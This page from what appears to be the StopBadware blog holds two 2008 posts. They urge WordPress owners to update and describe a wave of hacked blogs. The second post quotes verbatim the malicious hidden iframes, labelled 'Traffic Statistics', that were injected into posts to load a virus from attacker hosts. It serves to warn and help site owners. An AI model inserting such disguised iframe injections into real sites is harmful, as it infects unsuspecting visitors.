Home Internet Users Website Owners Software Producers Press Blog

Important WordPress security update

Posted by Erica George Mon, 28 Apr 2008 16:06:08 GMT

From the official WordPress.org blog:

Version 2.5.1 of WordPress is now available. It includes a number of bug fixes, performance enhancements, and one very important security fix. We recommend everyone update immediately, particularly if your blog has open registration. The vulnerability is not public but it will be shortly.

If you run a WordPress site, and haven’t already implemented this new security update, doing so now is your best bet to prevent your site from being victimized. Once hackers can reverse engineer the vulnerability, there will probably be attacks on sites running earlier versions of WordPress.

Badware distributors have attacked WordPress sites before, most notably with the recent wp-stats iframe. At StopBadware, we’re still hearing from website owners whose sites are running older versions of WordPress and are being compromised with wp-stats, which exploits a vulnerability that’s now several months old.

Our advice for owners of WordPress sites? As StopBadware volunteer Steven Whitney wrote during the previous wave of attacks:

New versions of WordPress should always be installed promptly because the popular blogging software is heavily targeted by hackers using automated crawlers. You can register at http://wordpress.org/ to receive email notifications when new versions are announced.

Posted in  | Tags , , ,

StopBadware discussion group sees flurry of hacked WordPress blogs

Posted by Erica George Mon, 18 Feb 2008 21:23:21 GMT

We like to feature occasional guest posts from members of the StopBadware community. Below, guest poster and StopBadware discussion group volunteer Steven Whitney sheds some light on a recent flurry of attacks on WordPress sites:

The StopBadware discussion group began receiving in January a flurry of reports about WordPress blogs suddenly flagged for badware by Google. The blogs had been hacked, and one or both of the following iframes were injected into their posts:

<!-- Traffic Statistics --> <iframe src="http://www.wp-stats-php. info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->

<!-- Traffic Statistics --> <iframe src="http://61.132.75. 71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->

In spite of their innocent-looking labeling, these links weren’t put on the pages by the authors, and they’re not for traffic statistics. The iframes, hosted on sites in Beijing, China, attack a visitor’s computer with the virus JS_PSYME.XP.

In this StopBadware thread about the iframes, a post by member Ty H describes how to use WordPress Site Admin to repair defaced blog posts.

In addition to repairing the pages, webmasters need to close the vulnerability that allows the iframe injections to occur.

On Feb. 5, WordPress issued version 2.3.3, an urgent security release to patch a flaw in xmlrpc.php that allowed a user to edit posts of other users. It’s not stated whether this release is a response to the iframe injections, but the discussion group members who upgraded to WP 2.3.3 have so far not reported recurrences.

New versions of WordPress should always be installed promptly because the popular blogging software is heavily targeted by hackers using automated crawlers. You can register at http://wordpress.org/ to receive email notifications when new versions are announced. Enter your email address in the box at the bottom of the page.

A list of known WordPress vulnerabilities can be found at Secunia.

When users solve problems together in the StopBadware discussion group and report their findings, it helps others who encounter the same problem later.

Posted in  | Tags , , ,

 
Home Internet Users Website Owners Software Producers Press Blog